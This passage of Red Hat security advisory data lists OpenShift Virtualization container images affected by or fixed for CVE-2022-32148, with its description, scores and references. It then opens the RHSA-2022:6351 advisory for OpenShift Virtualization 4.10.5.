"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/gob: stack exhaustion in Decoder.Decode", }, { cve: "CVE-2022-32148", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107383", }, ], notes: [ { category: "description", text: "A flaw was found in net/http/httputil golang package. When httputil.ReverseProxy.ServeHTTP is called with a Request.Header map containing a nil value for the X-Forwarded-For header, ReverseProxy could set the client IP incorrectly. This issue may affect confidentiality.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", title: "Vulnerability summary", }, { category: "other", text: "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token, multi-factor authentication (MFA), which is coupled with account management controls, including integration with single sign-on (SSO), to ensure that user permissions are restricted to only the functions necessary for their roles. Access to sensitive information is explicitly authorized and enforced based on predefined access policies. Event logs are collected and processed for centralization, correlation, analysis, monitoring, reporting, alerting, and retention. This process ensures that audit logs are generated for specific events involving sensitive information, which helps identify patterns of unauthorized access or data exposure. The platform enforces the use of validated cryptographic modules across compute resources to protect the confidentiality of information, even in the event of interception.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-32148", }, { category: "external", summary: "RHBZ#2107383", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-32148", url: "https://www.cve.org/CVERecord?id=CVE-2022-32148", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", }, { category: "external", summary: "https://go.dev/issue/53423", url: "https://go.dev/issue/53423", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", }, ], }
rhsa-2022:6351
Vulnerability from csaf_redhat
Published
2022-09-06 14:00
Modified
2024-11-25 08:02
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.10.5 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.10.5 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.10.5 images:
RHEL-8-CNV-4.10
===============
cluster-network-addons-operator-container-v4.10.5-1
kubemacpool-container-v4.10.5-1
virt-cdi-importer-container-v4.10.5-1
hyperconverged-cluster-operator-container-v4.10.5-1
hostpath-provisioner-operator-container-v4.10.5-1
virtio-win-container-v4.10.5-1
virt-cdi-cloner-container-v4.10.5-1
kubevirt-ssp-operator-container-v4.10.5-1
cnv-containernetworking-plugins-container-v4.10.5-1
hyperconverged-cluster-webhook-container-v4.10.5-1
virt-cdi-apiserver-container-v4.10.5-1
ovs-cni-plugin-container-v4.10.5-1
virt-cdi-uploadserver-container-v4.10.5-1
virt-cdi-uploadproxy-container-v4.10.5-1
virt-cdi-controller-container-v4.10.5-1
kubevirt-template-validator-container-v4.10.5-1
virt-cdi-operator-container-v4.10.5-1
hostpath-provisioner-container-v4.10.5-1
hostpath-csi-driver-container-v4.10.5-1
kubernetes-nmstate-handler-container-v4.10.5-1
ovs-cni-marker-container-v4.10.5-1
bridge-marker-container-v4.10.5-1
node-maintenance-operator-container-v4.10.5-1
cnv-must-gather-container-v4.10.5-2
virt-controller-container-v4.10.5-3
virt-api-container-v4.10.5-3
virt-handler-container-v4.10.5-3
virt-operator-container-v4.10.5-3
virt-artifacts-server-container-v4.10.5-3
virt-launcher-container-v4.10.5-3
libguestfs-tools-container-v4.10.5-3
hco-bundle-registry-container-v4.10.5-6
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* go-restful: Authorization Bypass Through User-Controlled Key (CVE-2022-1996)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
